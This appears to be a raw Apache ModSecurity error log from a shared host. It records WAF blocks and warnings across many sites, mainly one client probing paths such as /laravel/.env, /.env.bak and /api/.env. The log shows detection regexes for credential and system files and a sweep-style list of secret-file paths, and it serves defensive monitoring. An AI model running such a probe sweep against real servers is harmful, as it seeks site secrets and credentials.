[Tue May 26 13:53:57.737242 2026] [security2:error] [pid 560287:tid 560457] [client 106.192.248.115:55148] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYnZmX5s6sDS3wJVcjjwAAAKo"]
[Tue May 26 13:53:59.146793 2026] [security2:error] [pid 560287:tid 560538] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYnpmX5s6sDS3wJVcjpgAAAPY"]
[Tue May 26 13:53:59.532516 2026] [security2:error] [pid 555743:tid 555919] [client 46.8.222.237:37793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.222.8.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYn8jqAquC0YaxQjDBWwAAATg"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:53:59.532686 2026] [security2:error] [pid 555743:tid 555919] [client 46.8.222.237:37793] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYn8jqAquC0YaxQjDBWwAAATg"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:54:00.322387 2026] [security2:error] [pid 555743:tid 555983] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYn8jqAquC0YaxQjDBYAAAAXg"]
[Tue May 26 13:54:00.329638 2026] [cgid:error] [pid 560287:tid 560444] [client 185.92.25.108:26699] AH01265: stderr from /home2/svijakqj/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 13:54:02.812848 2026] [security2:error] [pid 560287:tid 560443] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYopmX5s6sDS3wJVcj7gAAAJ0"]
[Tue May 26 13:54:03.692146 2026] [security2:error] [pid 555743:tid 555920] [client 74.7.244.31:47026] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rabbanitradingcompany.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVYo8jqAquC0YaxQjDBjgABOTo"]
[Tue May 26 13:54:03.805606 2026] [security2:error] [pid 555743:tid 555951] [client 74.7.230.36:59086] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rabbanitradingcompany.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVYo8jqAquC0YaxQjDBkQABWHk"]
[Tue May 26 13:54:04.440149 2026] [security2:error] [pid 560287:tid 560520] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYpJmX5s6sDS3wJVckEAAAAOY"]
[Tue May 26 13:54:05.407459 2026] [security2:error] [pid 560287:tid 560451] [client 129.222.147.134:42420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYpZmX5s6sDS3wJVckKQAAAKU"]
[Tue May 26 13:54:05.415248 2026] [security2:error] [pid 560287:tid 560451] [client 129.222.147.134:42420] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYpZmX5s6sDS3wJVckKQAAAKU"]
[Tue May 26 13:54:06.630464 2026] [security2:error] [pid 560287:tid 560530] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYppmX5s6sDS3wJVckNgAAAPA"]
[Tue May 26 13:54:06.798046 2026] [security2:error] [pid 560287:tid 560545] [client 37.19.197.137:22599] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env.backup"] [unique_id "ahVYppmX5s6sDS3wJVckQQAAAP0"]
[Tue May 26 13:54:06.798387 2026] [security2:error] [pid 560287:tid 560505] [client 37.19.197.137:51143] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/api/.env"] [unique_id "ahVYppmX5s6sDS3wJVckQgAAANc"]
[Tue May 26 13:54:06.820676 2026] [security2:error] [pid 560287:tid 560439] [client 37.19.197.137:3608] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/crm/.env"] [unique_id "ahVYppmX5s6sDS3wJVckRAAAAJo"]
[Tue May 26 13:54:06.820782 2026] [security2:error] [pid 560287:tid 560480] [client 37.19.197.137:1593] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/wordpress/.env"] [unique_id "ahVYppmX5s6sDS3wJVckQwAAAL8"]
[Tue May 26 13:54:06.829007 2026] [security2:error] [pid 560287:tid 560475] [client 37.19.197.137:19367] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env.bak"] [unique_id "ahVYppmX5s6sDS3wJVckRQAAALs"]
[Tue May 26 13:54:06.835611 2026] [security2:error] [pid 560287:tid 560511] [client 37.19.197.137:40447] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/erp/.env"] [unique_id "ahVYppmX5s6sDS3wJVckRwAAAN0"]
[Tue May 26 13:54:06.844838 2026] [security2:error] [pid 560287:tid 560547] [client 37.19.197.137:45535] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/laravel/.env"] [unique_id "ahVYppmX5s6sDS3wJVckSQAAAP8"]
[Tue May 26 13:54:06.846168 2026] [security2:error] [pid 555743:tid 555941] [client 37.19.197.137:55756] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/config/.env"] [unique_id "ahVYpsjqAquC0YaxQjDBvAAAAU4"]
[Tue May 26 13:54:06.850124 2026] [security2:error] [pid 555743:tid 555891] [client 37.19.197.137:64723] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/app/.env"] [unique_id "ahVYpsjqAquC0YaxQjDBvgAAARw"]
[Tue May 26 13:54:06.860076 2026] [security2:error] [pid 555743:tid 555934] [client 37.19.197.137:7833] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/backend/.env"] [unique_id "ahVYpsjqAquC0YaxQjDBvwAAAUc"]
[Tue May 26 13:54:07.217534 2026] [security2:error] [pid 560287:tid 560472] [client 37.19.197.137:22936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/wordpress/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckVwAAALg"]
[Tue May 26 13:54:07.219370 2026] [security2:error] [pid 560287:tid 560508] [client 37.19.197.137:64520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/crm/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckVgAAANo"]
[Tue May 26 13:54:07.235680 2026] [security2:error] [pid 555743:tid 555994] [client 37.19.197.137:38241] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env.bak"] [unique_id "ahVYp8jqAquC0YaxQjDBwgAAAYM"]
[Tue May 26 13:54:07.241731 2026] [security2:error] [pid 560287:tid 560544] [client 37.19.197.137:8567] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/erp/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckWwAAAPw"]
[Tue May 26 13:54:07.278300 2026] [security2:error] [pid 555743:tid 555925] [client 37.19.197.137:15018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/api/.env"] [unique_id "ahVYp8jqAquC0YaxQjDBwwAAAT4"]
[Tue May 26 13:54:07.293527 2026] [security2:error] [pid 560287:tid 560532] [client 37.19.197.137:13207] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/app/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckXAAAAPI"]
[Tue May 26 13:54:07.339728 2026] [security2:error] [pid 560287:tid 560478] [client 37.19.197.137:9615] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/config/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckXgAAAL4"]
[Tue May 26 13:54:07.390463 2026] [security2:error] [pid 560287:tid 560422] [client 37.19.197.137:46098] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/public_html/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckZQAAAIk"]
[Tue May 26 13:54:07.400042 2026] [security2:error] [pid 560287:tid 560510] [client 37.19.197.137:13987] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/public/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckZgAAANw"]
[Tue May 26 13:54:07.483670 2026] [security2:error] [pid 560287:tid 560445] [client 37.19.197.137:37947] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/www/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckbQAAAJ8"]
[Tue May 26 13:54:07.537289 2026] [security2:error] [pid 560287:tid 560526] [client 37.19.197.137:59342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/cms/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckbwAAAOw"]
[Tue May 26 13:54:07.791995 2026] [security2:error] [pid 560287:tid 560523] [client 37.19.197.137:64657] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/public_html/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckdgAAAOk"]
[Tue May 26 13:54:07.849000 2026] [security2:error] [pid 555743:tid 555886] [client 37.19.197.137:62323] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/www/.env"] [unique_id "ahVYp8jqAquC0YaxQjDB0QAAARc"]
[Tue May 26 13:54:07.871163 2026] [security2:error] [pid 555743:tid 555899] [client 37.19.197.137:22082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env.backup"] [unique_id "ahVYp8jqAquC0YaxQjDB0gAAASQ"]
[Tue May 26 13:54:07.908619 2026] [security2:error] [pid 555743:tid 555976] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYp8jqAquC0YaxQjDByAAAAXE"]
[Tue May 26 13:54:07.962073 2026] [security2:error] [pid 560287:tid 560541] [client 37.19.197.137:32902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/cms/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckfgAAAPk"]
[Tue May 26 13:54:08.169303 2026] [security2:error] [pid 555743:tid 555936] [client 37.19.197.137:43116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/backend/.env"] [unique_id "ahVYqMjqAquC0YaxQjDB3AAAAUk"]
[Tue May 26 13:54:08.170183 2026] [security2:error] [pid 560287:tid 560490] [client 37.19.197.137:45518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/public/.env"] [unique_id "ahVYqJmX5s6sDS3wJVckgAAAAMk"]
[Tue May 26 13:54:08.346455 2026] [security2:error] [pid 560287:tid 560446] [client 37.19.197.137:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/laravel/.env"] [unique_id "ahVYqJmX5s6sDS3wJVckhAAAAKA"]
[Tue May 26 13:54:09.786685 2026] [security2:error] [pid 555743:tid 555894] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYqcjqAquC0YaxQjDB9wAAAR8"]
[Tue May 26 13:54:09.971845 2026] [security2:error] [pid 560287:tid 560470] [client 106.192.248.115:55452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYqZmX5s6sDS3wJVckpgAAALY"]
[Tue May 26 13:54:09.971985 2026] [security2:error] [pid 560287:tid 560470] [client 106.192.248.115:55452] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYqZmX5s6sDS3wJVckpgAAALY"]
[Tue May 26 13:54:10.036879 2026] [security2:error] [pid 560287:tid 560509] [client 201.137.246.134:37195] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYqZmX5s6sDS3wJVckpAAAANs"]
[Tue May 26 13:54:10.129737 2026] [security2:error] [pid 560287:tid 560509] [client 201.137.246.134:37195] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYqZmX5s6sDS3wJVckpAAAANs"]
[Tue May 26 13:54:11.236800 2026] [security2:error] [pid 560287:tid 560481] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYqpmX5s6sDS3wJVcktgAAAMA"]
[Tue May 26 13:54:13.666739 2026] [security2:error] [pid 560287:tid 560529] [client 74.7.230.8:32798] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahVYrZmX5s6sDS3wJVck7QAAAO8"]
